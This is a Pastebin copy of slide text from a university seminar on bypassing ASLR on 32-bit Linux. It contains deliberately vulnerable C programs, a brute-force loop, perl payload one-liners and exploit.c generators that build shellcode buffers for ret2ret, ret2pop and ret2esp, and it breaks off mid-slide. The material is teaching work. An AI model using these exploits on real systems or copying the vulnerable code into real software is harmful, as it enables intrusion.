API tools faq
paste
Advertisement
xdxdxd123

Untitled

xdxdxd123
May 22nd, 2017
228
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 25.39 KB | None | 0 0
raw download clone embed print report
  1. Computer Science, Informatik 4
  2. Communication and Distributed Systems
  3. ASLR
  4. Address Space Layout Randomization
  5. Seminar on Advanced Exploitation Techniques
  6. Chair of Computer Science 4
  7. RWTH Aachen
  8. Tilo Müller
  9. Computer Science, Informatik 4
  10. Communication and Distributed Systems
  11. What is ASLR?
  12. - A security technology to prevent exploitation of buffer overflows
  13. - Most popular alternative: Nonexecutable stack
  14. - Enabled by default since Kernel 2.6.12 (2005) / Vista Beta 2 (2006)
  15. - Earlier third party implementations: PaX (since 2000)
  16. Computer Science, Informatik 4
  17. Communication and Distributed Systems
  18. How does ASLR work?
  19. - ASLR = Address Space Layout Randomization
  20. - Aim: Introduce randomness into the address space of each instantiation
  21. (24 bits of a 32-bit address are randomized)
  22. → Addresses of infiltrated shellcode are not predictive anymore
  23. → Common Exploitation techniques fail, because the place of the shellcode
  24. is unknown
  25. 1 st inst. 2 st inst.
  26. bfaa2e58
  27. bf9114c8
  28. process
  29. memory
  30. process
  31. memory
  32. stack
  33. ...
  34. ...
  35. bfaa2e14
  36. bfaa2e10
  37. bf911484
  38. bf911480
  39. Computer Science, Informatik 4
  40. Communication and Distributed Systems
  41. How does ASLR work?
  42. unsigned long getEBP(void) {
  43. __asm__(“movl %ebp,%eax”);
  44. }
  45. int main(void) {
  46. printf(“EBP: %x\n”,getEBP());
  47. }
  48. getEBP.c
  49. Demonstration:
  50. > ./getEBP
  51. EBP:bffff3b8
  52. > ./getEBP
  53. EBP:bffff3b8
  54. ASLR disabled:
  55. > ./getEBP
  56. EBP:bfaa2e58
  57. > ./getEBP
  58. EBP:bf9114c8
  59. ASLR enabled:
  60. Computer Science, Informatik 4
  61. Communication and Distributed Systems
  62. What is randomized?
  63. - Only the stack and libraries
  64. e.g. not the heap, text, data and bss segment
  65. Demonstration:
  66. > cat /proc/self/maps | egrep '(libc|heap|stack)'
  67. 0804d000-0806e000 rw-p 0804d000 00:00 0 [heap]
  68. b7e5e000-b7fa5000 r-xp 00000000 08:01 1971213 /lib/i686/cmov/libc-2.7.so
  69. b7fa5000-b7fa6000 r--p 00147000 08:01 1971213 /lib/i686/cmov/libc-2.7.so
  70. b7fa6000-b7fa8000 rw-p 00148000 08:01 1971213 /lib/i686/cmov/libc-2.7.so
  71. bfa0d000-bfa22000 rw-p bffeb000 00:00 0 [stack]
  72. cat /proc/self/maps | egrep '(libc|heap|stack)'
  73. 0804d000-0806e000 rw-p 0804d000 00:00 0 [heap]
  74. b7da0000-b7ee7000 r-xp 00000000 08:01 1971213 /lib/i686/cmov/libc-2.7.so
  75. b7ee7000-b7ee8000 r--p 00147000 08:01 1971213 /lib/i686/cmov/libc-2.7.so
  76. b7ee8000-b7eea000 rw-p 00148000 08:01 1971213 /lib/i686/cmov/libc-2.7.so
  77. bfa86000-bfa9b000 rw-p bffeb000 00:00 0 [stack]
  78. Computer Science, Informatik 4
  79. Communication and Distributed Systems
  80. Overview of ASLR resistant exploits
  81. 1. Brute force
  82. 2. Return into non-randomized memory
  83. 3. Pointer redirecting
  84. 4. Stack divulging methods
  85. 5. Stack juggling methods
  86. More methods can be found in the paper (e.g. GOT hijacking or overwriting .dtors)
  87. Computer Science, Informatik 4
  88. Communication and Distributed Systems
  89. 1. Bruteforce
  90. Success of bruteforce is based on:
  91. - The tolerance of an exploit to variations in the address space layout
  92. (e.g. how many NOPs can be placed in the buffer)
  93. - How many exploitation attempts can be performed
  94. (e.g. it is necessary that a network daemon restarts after crash)
  95. - How fast the exploitation attempts can be performed
  96. (e.g. locally vs. over network)
  97. void function(char *args) {
  98. char buff[4096];
  99. strcpy(buff, args);
  100. }
  101. int main(int argc, char *argv[]) {
  102. function(argv[1]);
  103. return 0;
  104. }
  105. vuln.c Example:
  106. Computer Science, Informatik 4
  107. Communication and Distributed Systems
  108. 1. Bruteforce
  109. EBP →
  110. RIP/ bf...
  111. 4096
  112. byte
  113. ESP →
  114. shell-
  115. code
  116. ...
  117. NOPs
  118. plausible
  119. value
  120. RIP/ bf...
  121. shell-
  122. code
  123. ...
  124. NOPs
  125. RIP/ bf...
  126. shell-
  127. code
  128. ...
  129. NOPs
  130. miss
  131. miss
  132. hit
  133. 1 2 3
  134. Computer Science, Informatik 4
  135. Communication and Distributed Systems
  136. 1. Bruteforce
  137. Chance: 1 to 2 24 /4096 = 4096 → 2048 attempts on average
  138. Solution: Upgrade to a 64-bit architecture
  139. #! /bin/sh
  140. while [ 0 ]; do
  141. ./vuln `./exploit $i`
  142. i=$(($i + 2048))
  143. if [ $i –gt 16777216 ]; then
  144. i=0
  145. fi
  146. done;
  147. It takes about 3 minutes on a 1.5 GHz CPU to get the exploit working:
  148. ...
  149. Return Address: 0xbfa38901
  150. ./bruteforce.sh: line 9: 19081 Segmentation fault
  151. Return Address: 0xbfa39101
  152. sh-3.1$
  153. Examplary bruteforce attack:
  154. Computer Science, Informatik 4
  155. Communication and Distributed Systems
  156. Overview
  157. 1. Brute force
  158. 2. Return into non-randomized memory
  159. 3. Pointer redirecting
  160. 4. Stack divulging methods
  161. 5. Stack juggling methods
  162. Computer Science, Informatik 4
  163. Communication and Distributed Systems
  164. 2. Return into non-randomized memory
  165. not
  166. randomized
  167. randomized
  168. → Exploitation Techniques:
  169. ret2heap
  170. ret2bss
  171. ret2data
  172. ret2text
  173. - Stack: parameters and dynamic local variables
  174. - Heap: dynamically created data structures (malloc)
  175. - BSS: uninitialized global and static local variables
  176. - Data: initialized global and static local variables
  177. - Text: readonly program code
  178. Computer Science, Informatik 4
  179. Communication and Distributed Systems
  180. 2a. ret2text
  181. The text region is marked readonly
  182. → it is just possible to manipulate the program flow
  183. (advanced: borrowed code)
  184. void public(char* args) {
  185. char buff[12];
  186. strcpy(buff,args);
  187. printf(“public\n”);
  188. }
  189. void secret(void) {
  190. printf(“secret\n”);
  191. }
  192. int main(int argc, char* argv[]) {
  193. if (getuid() == 0) secret();
  194. else public(argv[1]);
  195. }
  196. vuln.c
  197. Example:
  198. Computer Science, Informatik 4
  199. Communication and Distributed Systems
  200. 2a. ret2text
  201. #! /bin/bash
  202. ./vuln `perl -e 'print "A"x16; print "\xfa\x83\x04\x08"'`
  203. exploit.sh
  204. ...
  205. stack
  206. text
  207. RIP / 0x080483fa
  208. SFP / AAAA
  209. buff / AAAA
  210. 0x080483fa: void secret(void)
  211. Computer Science, Informatik 4
  212. Communication and Distributed Systems
  213. 2b. ret2bss
  214. char globalbuf[256];
  215. void function(char* input) {
  216. char localbuf[256];
  217. strcpy(localbuf, input);
  218. strcpy(globalbuf, localbuf);
  219. }
  220. int main(int argc, char** argv) {
  221. function(argv[1]);
  222. }
  223. vuln.c
  224. - The bss segment contains the uninitialized global variables:
  225. - Two buffers are needed, one on the stack and one in the bss segment
  226. Computer Science, Informatik 4
  227. Communication and Distributed Systems
  228. 2b. ret2bss
  229. ...
  230. stack
  231. (randomized)
  232. bss
  233. (not
  234. randomized)
  235. 0x080495e0
  236. AAAA
  237. AAAA
  238. 0x080495e0:
  239. global
  240. buff
  241. local
  242. buff
  243. shellcode
  244. shellcode
  245. AAAA
  246. RIP
  247. SFP
  248. Computer Science, Informatik 4
  249. Communication and Distributed Systems
  250. 2c. ret2data
  251. 2d. ret2heap
  252. Similar to ret2bss. Examples of vulnerable code:
  253. - Data: Initialized global variables
  254. - Heap: Dynamically created data structures
  255. char* globalbuf = "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
  256. AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA”;
  257. void function(char* input) {
  258. char localbuf[256];
  259. strcpy(localbuf, input);
  260. strcpy(globalbuf, localbuf);
  261. }
  262. void function(char* input) {
  263. char local_buff[256];
  264. char *heap_buff;
  265. strcpy(local_buff,input);
  266. heap_buff = (char *) malloc(sizeof(local_buff));
  267. strcpy(heap_buff,local_buff);
  268. }
  269. Computer Science, Informatik 4
  270. Communication and Distributed Systems
  271. Overview
  272. 1. Brute force
  273. 2. Return into non-randomized memory
  274. 3. Pointer redirecting
  275. 4. Stack divulging methods
  276. 5. Stack juggling methods
  277. Computer Science, Informatik 4
  278. Communication and Distributed Systems
  279. 3. Pointer redirecting
  280. - Hardcoded strings are saved within non-randomized areas
  281. → It is possible to redirect a string pointer to another one
  282. - Interesting string pointers are arguments of system, execve, ...
  283. - Example:
  284. int main(int argc, char* args[]) {
  285. char input[256];
  286. char *conf = "test -f ~/.progrc";
  287. char *license = "THIS SOFTWARE IS PROVIDED...\n";
  288. printf(license);
  289. strcpy(input,args[1]);
  290. if (system(conf)) printf("Error: missing .progrc\n");
  291. }
  292. vuln.c
  293. Goal: Execute system(“THIS SOFTWARE IS...\n”);
  294. → system tries to execute THIS → write a script called THIS, e.g.:
  295. #! /bin/bash
  296. /bin/bash
  297. Computer Science, Informatik 4
  298. Communication and Distributed Systems
  299. 3. Pointer redirecting
  300. ...
  301. stack
  302. data
  303. input
  304. *conf
  305. *license 0x08048562
  306. 0x08048550
  307. THIS SOFTWARE
  308. IS ...
  309. test -f
  310. ~/.progrc
  311. system(conf)
  312. =
  313. system(“test -f ~/.progrc”)
  314. Computer Science, Informatik 4
  315. Communication and Distributed Systems
  316. 3. Pointer redirecting
  317. ...
  318. stack
  319. data
  320. input
  321. *conf
  322. *license 0x08048562
  323. 0x08048562
  324. THIS SOFTWARE
  325. IS ...
  326. test -f
  327. ~/.progrc
  328. system(conf)
  329. =
  330. system(“THIS SOFTWARE IS...”)
  331. AAAA
  332. Computer Science, Informatik 4
  333. Communication and Distributed Systems
  334. 3. Pointer redirecting
  335. int main(int argc, char* args[]) {
  336. char input[256];
  337. char *conf = "test -f ~/.progrc";
  338. char *license = "THIS SOFTWARE IS PROVIDED...\n";
  339. printf(license);
  340. strcpy(input,args[1]);
  341. if (system(conf)) printf("Error: missing .progrc\n");
  342. }
  343. vuln.c
  344. #! /bin/sh
  345. echo "/bin/sh" > THIS
  346. chmod 777 THIS
  347. PATH=.:$PATH
  348. ./vuln `perl -e 'print "A"x256; print "\x62\x85\x04\x08"x2'`
  349. exploit.sh
  350. Computer Science, Informatik 4
  351. Communication and Distributed Systems
  352. Overview
  353. 1. Brute force
  354. 2. Return into non-randomized memory
  355. 3. Pointer redirecting
  356. 4. Stack divulging methods
  357. 5. Stack juggling methods
  358. Computer Science, Informatik 4
  359. Communication and Distributed Systems
  360. 4. Stack divulging methods
  361. #define SA struct sockaddr
  362. int listenfd, connfd;
  363. void function(char* str) {
  364. char readbuf[256];
  365. char writebuf[256];
  366. strcpy(readbuf,str);
  367. sprintf(writebuf,readbuf);
  368. write(connfd,writebuf,strlen(writebuf));
  369. }
  370. int main(int argc, char* argv[]) {
  371. char line[1024];
  372. struct sockaddr_in servaddr;
  373. ssize_t n;
  374. listenfd = socket (AF_INET, SOCK_STREAM, 0);
  375. bzero(&servaddr, sizeof(servaddr));
  376. servaddr.sin_family = AF_INET;
  377. servaddr.sin_addr.s_addr = htonl(INADDR_ANY);
  378. servaddr.sin_port = htons(7776);
  379. bind(listenfd, (SA*)&servaddr, sizeof(servaddr));
  380. listen(listenfd, 1024);
  381. for(;;) {
  382. connfd = accept(listenfd, (SA*)NULL,NULL);
  383. write(connfd,"> ",2);
  384. n = read(connfd, line, sizeof(line)-1);
  385. line[n] = 0;
  386. function(line);
  387. close(connfd);
  388. }
  389. }
  390. vuln.c
  391. - Goal:
  392. Discover informations about
  393. the address space layout
  394. - Possibility 1:
  395. Stack stethoscope
  396. (/proc/<pid>/stat)
  397. - Possibility 2:
  398. Format string vulnerabilities
  399. Computer Science, Informatik 4
  400. Communication and Distributed Systems
  401. 4a. Stack stethoscope
  402. - Address of a process stack's bottom:
  403. 28 th item of /proc/<pid>/stat
  404. - The remaining stack can be calculated, since offsets are constant
  405. - The stat-file is readable by every user per default:
  406. > dir /proc/$(pidof vuln)/stat
  407. -r--r--r-- 1 2008-02-26 22:01 /proc/12356/stat
  408. - Disadvantage:Access to the machine is required
  409. Advantage: ASLR is almost useless if one have this access
  410. Computer Science, Informatik 4
  411. Communication and Distributed Systems
  412. 4a. Stack stethoscope
  413. stack bottom
  414. ...
  415. function
  416. main
  417. SFP
  418. RIP
  419. readbuf
  420. writebuf
  421. constant offset
  422. (bfe14f30 – bfe14858 = 6d8)
  423. Computer Science, Informatik 4
  424. Communication and Distributed Systems
  425. 4a. Stack stethoscope
  426. stack bottom
  427. function
  428. main
  429. SFP
  430. RIP
  431. readbuf
  432. writebuf shellcode
  433. sb - offset
  434. sb = cat /proc/$(pidof vuln)/stat | awk '{ print $28 }'
  435. offset = 6d8
  436. ...
  437. Computer Science, Informatik 4
  438. Communication and Distributed Systems
  439. 4b. Format strings
  440. #define SA struct sockaddr
  441. int listenfd, connfd;
  442. void function(char* str) {
  443. char readbuf[256];
  444. char writebuf[256];
  445. strcpy(readbuf,str);
  446. sprintf(writebuf,readbuf);
  447. write(connfd,writebuf,strlen(writebuf));
  448. }
  449. int main(int argc, char* argv[]) {
  450. char line[1024];
  451. struct sockaddr_in servaddr;
  452. ssize_t n;
  453. listenfd = socket (AF_INET, SOCK_STREAM, 0);
  454. bzero(&servaddr, sizeof(servaddr));
  455. servaddr.sin_family = AF_INET;
  456. servaddr.sin_addr.s_addr = htonl(INADDR_ANY);
  457. servaddr.sin_port = htons(7776);
  458. bind(listenfd, (SA*)&servaddr, sizeof(servaddr));
  459. listen(listenfd, 1024);
  460. for(;;) {
  461. connfd = accept(listenfd, (SA*)NULL,NULL);
  462. write(connfd,"> ",2);
  463. n = read(connfd, line, sizeof(line)-1);
  464. line[n] = 0;
  465. function(line);
  466. close(connfd);
  467. }
  468. }
  469. vuln.c
  470. ← Format string vulnerability,
  471. that can be used to receive
  472. stack addresses
  473. Correct:
  474. sprintf(writebuf,”%s”,readbuf);
  475. Advantage:
  476. No access to the machine is
  477. required.
  478. Computer Science, Informatik 4
  479. Communication and Distributed Systems
  480. sprintf() function()
  481. SFP
  482. RIP
  483. %20$x
  484. ...
  485. ...
  486. bfb71ec8
  487. 20 th parameter above the format string
  488. ...
  489. stack bottom
  490. constant offset
  491. bfb72550 - bfb71ec8 = 688
  492. 4b. Format strings
  493. → The stack bottom can be calculated by an
  494. exploitation of the format string vulnerability
  495. → Afterwards the exploit from the stethoscope
  496. attack can be used again
  497. Example:
  498. > echo "%20\$x" | \
  499. > nc localhost 7776
  500. > bfb71ec8
  501. Computer Science, Informatik 4
  502. Communication and Distributed Systems
  503. Overview
  504. 1. Brute force
  505. 2. Return into non-randomized memory
  506. 3. Pointer redirecting
  507. 4. Stack divulging methods
  508. 5. Stack juggling methods
  509. Computer Science, Informatik 4
  510. Communication and Distributed Systems
  511. Based on a pointer that is a potential pointer to the shellcode.
  512. SFP
  513. RIP
  514. buff
  515. Pointer
  516. ...
  517. 5a. ret2ret
  518. Computer Science, Informatik 4
  519. Communication and Distributed Systems
  520. A potential pointer points to the shellcode if its last significant byte is
  521. overwritten by zero (string termination).
  522. But how to use this aligned pointer as return instruction pointer?
  523. ??
  524. Pointer x00
  525. ??
  526. buff
  527. NOPs
  528. ...
  529. shellcode
  530. ...
  531. 5a. ret2ret
  532. Computer Science, Informatik 4
  533. Communication and Distributed Systems
  534. Solution: chain of ret's.
  535. ret can be found in the text segment (which is not randomized)
  536. &ret
  537. Pointer x00
  538. &ret
  539. buff
  540. NOPs
  541. ...
  542. shellcode
  543. ...
  544. 5a. ret2ret
  545. Computer Science, Informatik 4
  546. Communication and Distributed Systems
  547. &ret
  548. Pointer x00
  549. &ret
  550. buff
  551. NOPs
  552. ...
  553. shellcode
  554. ...
  555. 5a. ret2ret
  556. ESP →
  557. EIP →
  558. EBP →
  559. b()
  560. a()
  561. leave
  562. = movl %ebp,%esp
  563. popl %ebp
  564. ret
  565. = popl %eip
  566. function epliogue of b:
  567. Computer Science, Informatik 4
  568. Communication and Distributed Systems
  569. &ret
  570. Pointer x00
  571. &ret
  572. buff
  573. NOPs
  574. ...
  575. shellcode
  576. ...
  577. 5a. ret2ret
  578. ESP →
  579. EIP →
  580. EBP →
  581. b()
  582. a()
  583. leave
  584. = movl %ebp,%esp
  585. popl %ebp
  586. ret
  587. = popl %eip
  588. Computer Science, Informatik 4
  589. Communication and Distributed Systems
  590. &ret
  591. Pointer x00
  592. &ret
  593. buff
  594. NOPs
  595. ...
  596. shellcode
  597. ...
  598. 5a. ret2ret
  599. ESP →
  600. EIP →
  601. EBP → ???
  602. b()
  603. a()
  604. leave
  605. = movl %ebp,%esp
  606. popl %ebp
  607. ret
  608. = popl %eip
  609. Computer Science, Informatik 4
  610. Communication and Distributed Systems
  611. &ret
  612. Pointer x00
  613. &ret
  614. buff
  615. NOPs
  616. ...
  617. shellcode
  618. ...
  619. 5a. ret2ret
  620. ESP →
  621. EIP →
  622. EBP → ???
  623. b()
  624. a()
  625. leave
  626. = movl %ebp,%esp
  627. popl %ebp
  628. ret
  629. = popl %eip
  630. Computer Science, Informatik 4
  631. Communication and Distributed Systems
  632. &ret
  633. Pointer x00
  634. &ret
  635. buff
  636. NOPs
  637. ...
  638. shellcode
  639. ...
  640. 5a. ret2ret
  641. ESP →
  642. EIP →
  643. EBP → ???
  644. b()
  645. a()
  646. leave
  647. = movl %ebp,%esp
  648. popl %ebp
  649. ret
  650. = popl %eip
  651. Computer Science, Informatik 4
  652. Communication and Distributed Systems
  653. &ret
  654. Pointer x00
  655. &ret
  656. buff
  657. NOPs
  658. ...
  659. shellcode
  660. ...
  661. 5a. ret2ret
  662. ESP →
  663. EIP →
  664. EBP → ???
  665. b()
  666. a()
  667. leave
  668. = movl %ebp,%esp
  669. popl %ebp
  670. ret
  671. = popl %eip
  672. Computer Science, Informatik 4
  673. Communication and Distributed Systems
  674. &ret
  675. Pointer x00
  676. &ret
  677. buff
  678. NOPs
  679. ...
  680. shellcode
  681. ...
  682. 5a. ret2ret
  683. ESP →
  684. EIP →
  685. EBP → ???
  686. b()
  687. a()
  688. leave
  689. = movl %ebp,%esp
  690. popl %ebp
  691. ret
  692. = popl %eip
  693. Computer Science, Informatik 4
  694. Communication and Distributed Systems
  695. &ret
  696. Pointer x00
  697. &ret
  698. buff
  699. NOPs
  700. ...
  701. shellcode
  702. ...
  703. 5a. ret2ret
  704. ESP →
  705. EIP →
  706. EBP → ???
  707. b()
  708. a()
  709. leave
  710. = movl %ebp,%esp
  711. popl %ebp
  712. ret
  713. = popl %eip
  714. Computer Science, Informatik 4
  715. Communication and Distributed Systems
  716. vuln.c
  717. #define RET 0x0804840f
  718. int main(void) {
  719. char *buff, *ptr;
  720. long *adr_ptr;
  721. int buf_size = 280;
  722. int ret_size = 20;
  723. buff = malloc(buf_size);
  724. ptr = buff;
  725. adr_ptr = (long *) ptr;
  726. for (i=0; i<buf_size; i+=4)
  727. *(adr_ptr++) = RET;
  728. for (i=0; i<buf_size-ret_size; i++)
  729. buff[i] = NOP;
  730. ptr = buff +
  731. (buf_size-ret_size-
  732. strlen(shellcode));
  733. for (i=0; i<strlen(shellcode); i++)
  734. *(ptr++) = shellcode[i];
  735. buff[buf_size] = '\0';
  736. printf("%s",buff);
  737. return 0;
  738. }
  739. exploit.c
  740. void function(char* overflow) {
  741. char buffer[256];
  742. strcpy(buffer, overflow);
  743. }
  744. int main(int argc, char** argv) {
  745. int no = 1;
  746. int* ptr = &no;
  747. function(argv[1]);
  748. return 1;
  749. }
  750. 5a. ret2ret
  751. Computer Science, Informatik 4
  752. Communication and Distributed Systems
  753. After strcpy the shellcode is stored redundant in the memory.
  754. Idea: Use a perfect pointer to the shellcode placed in argv.
  755. SFP
  756. RIP
  757. buff
  758. Pointer
  759. argv
  760. shellcode
  761. ...
  762. 5b. ret2pop
  763. EIP =
  764. Computer Science, Informatik 4
  765. Communication and Distributed Systems
  766. Problem: Avoid overwriting the last significant byte of the perfect pointer
  767. by zero.
  768. SFP
  769. RIP
  770. buff
  771. argv
  772. Pointer x00
  773. X
  774. 5b. ret2pop
  775. ...
  776. shellcode
  777. Computer Science, Informatik 4
  778. Communication and Distributed Systems
  779. Solution: A ret-chain followed by pop-ret.
  780. The pop instruction skips over the memory location which is overwritten
  781. by zero.
  782. ...
  783. &ret
  784. buff
  785. Pointer
  786. x00
  787. shellcode
  788. &pop-ret
  789. ...
  790. 5b. ret2pop
  791. argv
  792. ...
  793. shellcode
  794. Computer Science, Informatik 4
  795. Communication and Distributed Systems
  796. vuln.c
  797. #define POPRET 0x08048467
  798. #define RET 0x08048468
  799. int main(void) {
  800. char *buff, *ptr;
  801. long *adr_ptr;
  802. int i;
  803. buff = malloc(264);
  804. for (i=0; i<264; i++)
  805. buff[i] = 'A';
  806. ptr = buff+260;
  807. adr_ptr = (long *) ptr;
  808. for (i=260; i<264; i+=4)
  809. if (i == 260) *(adr_ptr++) = POPRET;
  810. else *(adr_ptr++) = RET;
  811. ptr = buff;
  812. for (i=0; i<strlen(shellcode); i++)
  813. *(ptr++) = shellcode[i];
  814. buff[264] = '\0';
  815. printf("%s",buff);
  816. return 0;
  817. }
  818. int function(int x, char *str) {
  819. char buf[256];
  820. strcpy(buf,str);
  821. return x;
  822. }
  823. int main(int argc, char **argv) {
  824. function(64, argv[1]);
  825. return 1;
  826. }
  827. exploit.c
  828. 5b. ret2pop
  829. Computer Science, Informatik 4
  830. Communication and Distributed Systems
  831. The position of the ESP is predictable during the function epilogue.
  832. → jmp *%esp
  833. EBP ➔
  834. ESP ➔
  835. SFP
  836. RIP
  837. buff
  838. 5c. ret2esp
  839. Computer Science, Informatik 4
  840. Communication and Distributed Systems
  841. The position of the ESP is predictable during the function epilogue.
  842. → jmp *%esp
  843. EBP ➔
  844. ESP ➔
  845. ...
  846. buff
  847. shellcode
  848. ...
  849. 5c. ret2esp
  850. &jmp *%esp
  851. Computer Science, Informatik 4
  852. Communication and Distributed Systems
  853. EBP ➔
  854. ESP ➔
  855. ...
  856. buff
  857. shellcode
  858. ...
  859. 5c. ret2esp
  860. leave
  861. = movl %ebp,%esp
  862. popl %ebp
  863. ret
  864. = popl %eip
  865. stack
  866. text segment
  867. function epilogue:
  868. ← EIP
  869. jmp *esp
  870. somewhere:
  871. ...
  872. &jmp *%esp
  873. ...
  874. Computer Science, Informatik 4
  875. Communication and Distributed Systems
  876. EBP ➔ ESP ➔ ...
  877. buff
  878. shellcode
  879. ...
  880. 5c. ret2esp
  881. leave
  882. = movl %ebp,%esp
  883. popl %ebp
  884. ret
  885. = popl %eip
  886. stack
  887. text segment
  888. function epilogue:
  889. ← EIP
  890. jmp *esp
  891. somewhere:
  892. &jmp *%esp
  893. Computer Science, Informatik 4
  894. Communication and Distributed Systems
  895. EBP ➔ ?
  896. ESP ➔
  897. ...
  898. buff
  899. shellcode
  900. ...
  901. 5c. ret2esp
  902. leave
  903. = movl %ebp,%esp
  904. popl %ebp
  905. ret
  906. = popl %eip
  907. stack
  908. text segment
  909. function epilogue:
  910. ← EIP
  911. jmp *esp
  912. somewhere:
  913. ...
  914. &jmp *%esp
  915. ...
  916. Computer Science, Informatik 4
  917. Communication and Distributed Systems
  918. ESP ➔
  919. ...
  920. buff
  921. shellcode
  922. ...
  923. 5c. ret2esp
  924. leave
  925. = movl %ebp,%esp
  926. popl %ebp
  927. ret
  928. = popl %eip
  929. stack
  930. text segment
  931. function epilogue:
  932. ← EIP
  933. jmp *esp
  934. somewhere:
  935. EBP ➔ ?
  936. ...
  937. &jmp *%esp
  938. ...
  939. Computer Science, Informatik 4
  940. Communication and Distributed Systems
  941. ESP ➔
  942. ...
  943. &jmp *%esp
  944. buff
  945. shellcode
  946. ...
  947. 5c. ret2esp
  948. leave
  949. = movl %ebp,%esp
  950. popl %ebp
  951. ret
  952. = popl %eip
  953. stack
  954. text segment
  955. function epilogue:
  956. EIP ➔
  957. jmp *%esp
  958. somewhere:
  959. EBP ➔ ?
  960. Computer Science, Informatik 4
  961. Communication and Distributed Systems
  962. 5c. ret2esp
  963. Problem: jmp *%esp is not produced by gcc
  964. Solution: Search the hexdump of a binary after e4ff,
  965. which will be interpreted as jmp *%esp.
  966. Example: The hardcoded number 58623 dec = e4ff hex
  967. The chance to find e4ff in practice is increased by the size of a
  968. binray.
  969. > hexdump /usr/bin/* | grep e4ff | wc -l
  970. 1183
  971. Computer Science, Informatik 4
  972. Communication and Distributed Systems
  973. #define JMP2ESP 0x080483e8
  974. int main(void) {
  975. char *buff, *ptr;
  976. long *adr_ptr;
  977. int i;
  978. buff = malloc(264);
  979. ptr = buff;
  980. adr_ptr = (long *)ptr;
  981. for (i=0; i<264+strlen(shellcode); i+=4)
  982. *(adr_ptr++) = JMP2ESP;
  983. ptr = buff+264;
  984. for (i=0; i<strlen(shellcode); i++)
  985. *(ptr++) = shellcode[i];
  986. buff[264+strlen(shellcode)] = '\0';
  987. printf("%s",buff);
  988. return 0;
  989. }
  990. void function(char* str) {
  991. char buf[256];
  992. strcpy(buf,str);
  993. }
  994. int main(int argc, char** argv) {
  995. int j = 58623;
  996. function(argv[1]);
  997. return 1;
  998. }
  999. vuln.c
  1000. exploit.c
  1001. 5c. ret2esp
  1002. Computer Science, Informatik 4
  1003. Communication and Distributed Systems
  1004. Return values are stored in EAX.
  1005. → EAX could contain a perfect shellcode pointer after a function
  1006. returns a pointer to user input.
  1007. → Overwrite RIP by a pointer to a call *%eax instruction
  1008. Example:
  1009. strcpy(buf,str) returns a pointer to buf, i.e.
  1010. bufptr = strcpy(buf,str);
  1011. effects EAX and bufptr to point to the same location as buf
  1012. 5d. ret2eax
  1013. vuln.c
  1014. void function(char* str) {
  1015. char buf[256];
  1016. strcpy(buf, str);
  1017. }
  1018. int main(int argc, char **argv) {
  1019. function(argv[1]);
  1020. return 1;
  1021. }
  1022. Computer Science, Informatik 4
  1023. Communication and Distributed Systems
  1024. EBP ➔
  1025. ESP ➔
  1026. RIP
  1027. SFP
  1028. buf
  1029. 5d. ret2eax
  1030. EAX = ?
  1031. void function(char* str) {
  1032. char buf[256];
  1033. strcpy(buf, str);
  1034. }
  1035. int main(int argc, char **argv) {
  1036. function(argv[1]);
  1037. return 1;
  1038. }
  1039. main() function()
  1040. Computer Science, Informatik 4
  1041. Communication and Distributed Systems
  1042. EBP ➔
  1043. ESP ➔
  1044. RIP
  1045. SFP
  1046. buf
  1047. 5d. ret2eax
  1048. EAX = ?
  1049. void function(char* str) {
  1050. char buf[256];
  1051. strcpy(buf, str);
  1052. }
  1053. int main(int argc, char **argv) {
  1054. function(argv[1]);
  1055. return 1;
  1056. }
  1057. main() function() strcpy()
  1058. ...
  1059. SFP
  1060. RIP
  1061. Computer Science, Informatik 4
  1062. Communication and Distributed Systems
  1063. EBP ➔
  1064. ESP ➔
  1065. buf
  1066. 5d. ret2eax
  1067. EAX = ?
  1068. void function(char* str) {
  1069. char buf[256];
  1070. strcpy(buf, str);
  1071. }
  1072. int main(int argc, char **argv) {
  1073. function(argv[1]);
  1074. return 1;
  1075. }
  1076. main() function() strcpy()
  1077. ...
  1078. SFP
  1079. RIP
  1080. &call *%eax
  1081. shellcode
  1082. ...
  1083. ...
  1084. ...
  1085. Computer Science, Informatik 4
  1086. Communication and Distributed Systems
  1087. EBP ➔
  1088. ESP ➔
  1089. buf
  1090. 5d. ret2eax
  1091. EAX →
  1092. void function(char* str) {
  1093. char buf[256];
  1094. strcpy(buf, str);
  1095. }
  1096. int main(int argc, char **argv) {
  1097. function(argv[1]);
  1098. return 1;
  1099. }
  1100. main() function()
  1101. shellcode
  1102. ...
  1103. ...
  1104. ...
  1105. &call *%eax
  1106. Computer Science, Informatik 4
  1107. Communication and Distributed Systems
  1108. EBP ➔
  1109. ESP ➔
  1110. buf
  1111. 5d. ret2eax
  1112. EAX →
  1113. void function(char* str) {
  1114. char buf[256];
  1115. strcpy(buf, str);
  1116. }
  1117. int main(int argc, char **argv) {
  1118. function(argv[1]);
  1119. return 1;
  1120. }
  1121. main() function()
  1122. shellcode
  1123. ...
  1124. ...
  1125. ...
  1126. leave
  1127. = movl %ebp,%esp
  1128. popl %ebp
  1129. ret
  1130. = popl %eip
  1131. ← EIP
  1132. &call *%eax
  1133. Computer Science, Informatik 4
  1134. Communication and Distributed Systems
  1135. EBP ➔ ESP ➔
  1136. buf
  1137. 5d. ret2eax
  1138. EAX →
  1139. void function(char* str) {
  1140. char buf[256];
  1141. strcpy(buf, str);
  1142. }
  1143. int main(int argc, char **argv) {
  1144. function(argv[1]);
  1145. return 1;
  1146. }
  1147. main() function()
  1148. shellcode
  1149. ...
  1150. ...
  1151. ...
  1152. leave
  1153. = movl %ebp,%esp
  1154. popl %ebp
  1155. ret
  1156. = popl %eip
  1157. ← EIP
  1158. &call *%eax
  1159. Computer Science, Informatik 4
  1160. Communication and Distributed Systems
  1161. EBP = ?
  1162. ESP ➔
  1163. buf
  1164. 5d. ret2eax
  1165. EAX →
  1166. void function(char* str) {
  1167. char buf[256];
  1168. strcpy(buf, str);
  1169. }
  1170. int main(int argc, char **argv) {
  1171. function(argv[1]);
  1172. return 1;
  1173. }
  1174. main() function()
  1175. shellcode
  1176. ...
  1177. ...
  1178. ...
  1179. leave
  1180. = movl %ebp,%esp
  1181. popl %ebp
  1182. ret
  1183. = popl %eip
  1184. ← EIP
  1185. &call *%eax
  1186. Computer Science, Informatik 4
  1187. Communication and Distributed Systems
  1188. EBP = ?
  1189. ESP ➔
  1190. buf
  1191. 5d. ret2eax
  1192. EAX →
  1193. void function(char* str) {
  1194. char buf[256];
  1195. strcpy(buf, str);
  1196. }
  1197. int main(int argc, char **argv) {
